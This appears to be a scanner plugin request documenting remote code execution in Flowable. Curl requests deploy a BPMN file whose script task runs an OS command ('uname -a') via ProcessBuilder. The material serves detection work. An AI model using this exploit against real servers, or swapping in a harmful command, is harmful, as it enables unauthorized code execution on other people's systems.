PRP: flowable None RCE #675
Description
- Identifier of the vulnerability:
None - Affected software: flowable
- Type of vulnerability: RCE
- Requires authentication: No
- Language you would use for writing the plugin: Templated
- Resources: https://github.com/flowable/flowable-engine
users can create deployments including bash scripts with flowable REST API.
Here how we can do the exploitation quickly:
docker run -p 127.0.0.1:8080:8080 flowable/flowable-rest
curl -X POST \
'http://localhost:8080/flowable-rest/service/repository/deployments' \
-H 'Content-Type: multipart/form-data' \
-H "Authorization: Basic cmVzdC1hZG1pbjp0ZXN0" \
-F 'file=@jsScript.bpmn'
curl -X POST \
'http://localhost:8080/flowable-rest/service/runtime/process-instances' \
-H 'Content-Type: application/json' \
-H "Authorization: Basic cmVzdC1hZG1pbjp0ZXN0" \
-d '{
"processDefinitionKey": "jsScriptProcess"
}'now you can see the output of the uname -a command.
attachment:
jsScript.bpmn file:
<?xml version="1.0" encoding="UTF-8"?>
<definitions xmlns="http://www.omg.org/spec/BPMN/20100524/MODEL"
xmlns:flowable="http://flowable.org/bpmn"
targetNamespace="Examples">
<process id="jsScriptProcess" name="JavaScript Script Process">
<startEvent id="start" />
<sequenceFlow sourceRef="start" targetRef="scriptTask" />
<scriptTask id="scriptTask" name="Execute Command via JavaScript"
scriptFormat="javascript"
flowable:autoStoreVariables="true">
<script>
var ProcessBuilder = Java.type('java.lang.ProcessBuilder');
var Arrays = Java.type('java.util.Arrays');
var Scanner = Java.type('java.util.Scanner');
var processBuilder = new ProcessBuilder(Arrays.asList('uname', '-a'));
var process = processBuilder.start();
var scanner = new Scanner(process.getInputStream()).useDelimiter("\\A");
var result = scanner.hasNext() ? scanner.next() : "";
execution.setVariable('commandOutput', result);
</script>
</scriptTask>
<sequenceFlow sourceRef="scriptTask" targetRef="end" />
<endEvent id="end" />
</process>
</definitions>